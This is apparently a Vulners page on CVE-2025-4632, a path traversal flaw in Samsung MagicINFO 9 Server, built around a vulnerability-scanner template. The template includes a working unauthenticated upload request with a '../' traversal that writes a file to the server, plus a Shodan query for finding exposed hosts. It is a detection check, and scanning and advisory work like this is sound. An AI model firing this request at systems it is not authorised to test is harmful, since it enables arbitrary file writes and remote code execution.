| Reporter | Title | Published | Views | Family All 22 |
|---|---|---|---|---|
| Exploit for Path Traversal in Samsung Magicinfo_9_Server | 6 May 202619:55 | – | githubexploit | |
| Exploit for Path Traversal in Samsung Magicinfo_9_Server | 4 Jun 202516:14 | – | githubexploit | |
| CVE-2025-4632 | 13 May 202500:00 | – | attackerkb | |
| The vulnerability of the MagicINFO 9 centralized multimedia content management system lies in the improper restriction on the path name to the restricted catalog. This allows a malicious actor to gain access and add arbitrary files. | 26 May 202500:00 | – | bdu_fstec | |
| CVE-2025-4632 | 13 May 202506:30 | – | circl | |
| Samsung MagicINFO 9 Server Path Traversal Vulnerability | 22 May 202500:00 | – | cisa_kev | |
| CISA Adds One Known Exploited Vulnerability to Catalog | 22 May 202512:00 | – | cisa | |
| SAMSUNG MagicINFO 9 Server 安全漏洞 | 13 May 202500:00 | – | cnnvd | |
| Samsung MagicINFO 9 Server Path Traversal Vulnerability | 28 May 202500:00 | – | cnvd | |
| CVE-2025-4632 | 13 May 202505:19 | – | cve |
id: CVE-2025-4632
info:
name: Samsung MagicINFO 9 Server - File Upload & Remote Code Execution
author: s4e-io
severity: critical
description: |
Improper limitation of a pathname to a restricted directory vulnerability in Samsung MagicINFO 9 Server version before 21.1052 allows attackers to write arbitrary file as system authority.
impact: |
Unauthenticated attackers can write arbitrary files with system authority through path traversal in the file upload endpoint, achieving remote code execution.
remediation: |
Upgrade Samsung MagicINFO 9 Server to version 21.1052 or later that properly validates file upload paths.
reference:
- https://arcticwolf.com/resources/blog/follow-up-samsung-patches-zero-day-vulnerability-magicinfo-9-server-cve-2025-4632/
- https://ssd-disclosure.com/ssd-advisory-samsung-magicinfo-unauthenticated-rce/
- https://www.huntress.com/blog/rapid-response-samsung-magicinfo9-server-flaw
- https://nvd.nist.gov/vuln/detail/cve-2025-4632
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2025-4632
cwe-id: CWE-22
epss-score: 0.23953
epss-percentile: 0.97558
cpe: cpe:2.3:a:samsung:magicinfo_9_server:*:*:*:*:*:*:*:*
metadata:
vendor: samsung
product: magicinfo_9_server
shodan-query: "Server: magicinfo premium server"
tags: cve,cve2025,file-upload,kev,rce,intrusive,vkev,vuln
variables:
filename: "{{rand_text_alpha(6)}}"
deviceType: "{{rand_text_alpha(6)}}"
deviceModelName: "{{rand_text_alpha(6)}}"
swVer: "{{rand_int(100, 999)}}"
marker: "{{rand_text_alpha(12)}}"
flow: http(1) && http(2)
http:
- raw:
- |
POST /MagicInfo/servlet/SWUpdateFileUploader?fileName=./../../../../../../server/{{filename}}.html&deviceType={{deviceType}}&deviceModelName={{deviceModelName}}&swVer={{swVer}} HTTP/1.1
Host: {{Hostname}}
Content-Type: text/plain
{{marker}}
matchers:
- type: dsl
dsl:
- 'status_code == 200'
- 'contains(server, "MagicInfo Premium Server")'
condition: and
internal: true
- raw:
- |
GET /MagicInfo/{{filename}}.html HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- 'contains(body, "{{marker}}")'
- "status_code == 200"
condition: and
# digest: 4a0a004730450221008a36178c00430e6c5e012767afe01b0499efec4d51b8c4a9efe9d70e045d78c60220249cb1cddd17da849fd43f36cc1bdc16654627b6f0b56459836a2afe82568de6:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation